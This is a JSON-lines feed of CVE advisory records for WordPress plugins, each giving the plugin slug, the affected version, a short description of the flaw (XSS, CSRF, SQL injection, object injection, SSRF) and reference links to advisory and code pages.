{"CVE_ID":"CVE-2025-7696","slug":"integration-for-contact-form-7-and-pipedrive","versionImpact":"1.2.3","description":"The Integration for Pipedrive and Contact Form 7, WPForms, Elementor, Ninja Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.3 via deserialization of untrusted input within the verify_field_val() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in the Contact Form 7 plugin, which is likely to be used alongside, allows attackers to delete arbitrary files, leading to a denial of service or remote code execution when the wp-config.php file is deleted.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-for-contact-form-7-and-pipedrive\\\/tags\\\/1.2.3\\\/integration-for-contact-form-7-and-pipedrive.php#L953\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-for-contact-form-7-and-pipedrive\\\/tags\\\/1.2.3\\\/integration-for-contact-form-7-and-pipedrive.php#L953\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329002\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329002\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-for-contact-form-7-and-pipedrive\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-for-contact-form-7-and-pipedrive\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6980112b-a555-47a4-b2d7-f0187d52fc63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6980112b-a555-47a4-b2d7-f0187d52fc63?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1334","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized cache modification due to a missing capability check on the queue_posts function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to modify the plugin's cache.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3108ef4-f889-4ae1-b86f-cedf46dcea19\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3108ef4-f889-4ae1-b86f-cedf46dcea19\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0421","slug":"cloud-manager","versionImpact":"1.0","description":"The Cloud Manager WordPress plugin through 1.0 does not sanitise and escape the query param ricerca before outputting it in an admin panel, allowing unauthenticated attackers to trick a logged in admin to trigger a XSS payload by clicking a link.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a356fea0-f143-4736-b2b2-c545c525335c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a356fea0-f143-4736-b2b2-c545c525335c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2896","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_duplicate_product function. This makes it possible for unauthenticated attackers to duplicate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/041830b8-f059-46f5-961b-3ba908d161f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/041830b8-f059-46f5-961b-3ba908d161f9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4916","slug":"login-with-phone-number","versionImpact":"1.4.8","description":"The Login with phone number plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.8. This is due to missing nonce validation on the 'lwp_update_password_action' function. This makes it possible for unauthenticated attackers to change user password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/trunk\\\/login-with-phonenumber.php#L2953\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/trunk\\\/login-with-phonenumber.php#L2953\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71083db7-377b-47a1-ac8b-83d8974a2654?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71083db7-377b-47a1-ac8b-83d8974a2654?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0769","slug":"hiweb-migration-simple","versionImpact":"2.0.0.1","description":"The hiWeb Migration Simple WordPress plugin through 2.0.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d4a2f0e-a371-4e27-98de-528e070f41b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d4a2f0e-a371-4e27-98de-528e070f41b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1758","slug":"woocommerce-superfaktura","versionImpact":"1.40.3","description":"The SuperFaktura WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.40.3 via the wc_sf_url_check function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520598d7-863f-4bf3-ba74-fa9b2cc32767?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520598d7-863f-4bf3-ba74-fa9b2cc32767?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-superfaktura\\\/trunk\\\/class-wc-superfaktura.php#L3418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-superfaktura\\\/trunk\\\/class-wc-superfaktura.php#L3418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040372%40woocommerce-superfaktura&new=3040372%40woocommerce-superfaktura&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040372%40woocommerce-superfaktura&new=3040372%40woocommerce-superfaktura&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1772","slug":"play-ht","versionImpact":"3.6.4","description":"The Play.ht \u2013 Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.6.4 via deserialization of untrusted input from the play_podcast_data post meta. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a595b7-379c-4202-abdd-d8ba4a30c6a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a595b7-379c-4202-abdd-d8ba4a30c6a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php#L138\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5485","slug":"suretriggers","versionImpact":"1.0.47","description":"The SureTriggers \u2013 Connect All Your Plugins, Apps, Tools & Automate Everything! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Trigger Link shortcode in all versions up to, and including, 1.0.47 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab19f7b1-2b1e-43bc-9843-ddee0fc74f50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab19f7b1-2b1e-43bc-9843-ddee0fc74f50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suretriggers\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suretriggers\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096816\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096816\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12526","slug":"arena-liveblog-and-chat-tool","versionImpact":"0.4.1","description":"The Arena.IM \u2013 Live Blogging for real-time events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3.0. This is due to missing or incorrect nonce validation on the 'albfre_user_action' AJAX action. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/albfre.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/albfre.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9173644-f0b2-4de3-8e58-fd556d8e38cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9173644-f0b2-4de3-8e58-fd556d8e38cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10797","slug":"full-screen-menu-for-elementor","versionImpact":"1.0.7","description":"The Full Screen Menu for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.7 via the Full Screen Menu Elementor Widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/full-screen-menu-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/full-screen-menu-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb0f29c-78df-46e6-a6f4-c8548d3e5185?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb0f29c-78df-46e6-a6f4-c8548d3e5185?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12249","slug":"gs-instagram-portfolio","versionImpact":"1.4.5","description":"The GS Insever Portfolio plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_settings() function in all versions up to, and including, 1.4.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's CSS settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-instagram-portfolio\\\/tags\\\/1.4.5\\\/admin\\\/Backend_Builder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-instagram-portfolio\\\/tags\\\/1.4.5\\\/admin\\\/Backend_Builder.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-instagram-portfolio\\\/tags\\\/1.4.5\\\/admin\\\/includes\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-instagram-portfolio\\\/tags\\\/1.4.5\\\/admin\\\/includes\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36f3e9be-9a4e-458d-92b3-687afc44696a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36f3e9be-9a4e-458d-92b3-687afc44696a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0353","slug":"addons-for-divi","versionImpact":"4.1.0","description":"The Divi Torque Lite \u2013 Best Divi Addon, Extensions, Modules & Social Modules plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/FlipBox\\\/FlipBox.php#L1053\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/FlipBox\\\/FlipBox.php#L1053\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/GradientHeading\\\/GradientHeading.php#L344\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/GradientHeading\\\/GradientHeading.php#L344\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/ImageCarouselChild\\\/ImageCarouselChild.php#L507\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/ImageCarouselChild\\\/ImageCarouselChild.php#L507\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InfoBox\\\/InfoBox.php#L852\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InfoBox\\\/InfoBox.php#L852\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InfoCard\\\/InfoCard.php#L688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InfoCard\\\/InfoCard.php#L688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InlineNotice\\\/InlineNotice.php#L486\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InlineNotice\\\/InlineNotice.php#L486\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/LogoCarouselChild\\\/LogoCarouselChild.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/LogoCarouselChild\\\/LogoCarouselChild.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/LogoGridChild\\\/LogoGridChild.php#L193\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/LogoGridChild\\\/LogoGridChild.php#L193\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/Review\\\/Review.php#L703\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/Review\\\/Review.php#L703\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/ScrollImage\\\/ScrollImage.php#L388\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/ScrollImage\\\/ScrollImage.php#L388\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/Testimonial\\\/Testimonial.php#L1147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/Testimonial\\\/Testimonial.php#L1147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/VideoModal\\\/VideoModal.php#L593\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/VideoModal\\\/VideoModal.php#L593\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230743\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230743\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-divi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-divi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5810757-1866-4788-809f-2c68e16a5156?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5810757-1866-4788-809f-2c68e16a5156?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0820","slug":"clicface-trombi","versionImpact":"2.08","description":"The Clicface Trombi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018nom\u2019 parameter in all versions up to, and including, 2.08 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicface-trombi\\\/trunk\\\/clicface-trombi.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicface-trombi\\\/trunk\\\/clicface-trombi.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/clicface-trombi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/clicface-trombi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d9ff834-8a11-4ec7-9371-15d56bc84106?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d9ff834-8a11-4ec7-9371-15d56bc84106?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2883","slug":"accept-sagepay-payments-using-contact-form-7","versionImpact":"2.0","description":"The Accept SagePay Payments Using Contact Form 7 plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accept-sagepay-payments-using-contact-form-7\\\/trunk\\\/inc\\\/front\\\/template\\\/cfspzw-info.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accept-sagepay-payments-using-contact-form-7\\\/trunk\\\/inc\\\/front\\\/template\\\/cfspzw-info.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3266837\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3266837\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accept-sagepay-payments-using-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accept-sagepay-payments-using-contact-form-7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed6cbd55-0e3a-4343-9e1b-b413a132bcdd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed6cbd55-0e3a-4343-9e1b-b413a132bcdd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2011","slug":"depicter","versionImpact":"3.6.1","description":"The Slider & Popup Builder by Depicter plugin for WordPress is vulnerable to generic SQL Injection via the \u2018s' parameter in all versions up to, and including, 3.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Database\\\/Repository\\\/LeadRepository.php?rev=3156664#L224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Database\\\/Repository\\\/LeadRepository.php?rev=3156664#L224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Services\\\/LeadService.php?rev=3156664#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Services\\\/LeadService.php?rev=3156664#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3287525\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3287525\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/depicter\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/depicter\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49b36cde-39d8-4a69-8d7c-7b850b76a7cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49b36cde-39d8-4a69-8d7c-7b850b76a7cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4189","slug":"audio-comments","versionImpact":"1.0.4","description":"The Audio Comments Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the 'audio-comments\/audior-settings.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-comments\\\/trunk\\\/audior-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-comments\\\/trunk\\\/audior-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89b12c36-e115-4f67-86e6-647dfc9fd25b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89b12c36-e115-4f67-86e6-647dfc9fd25b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
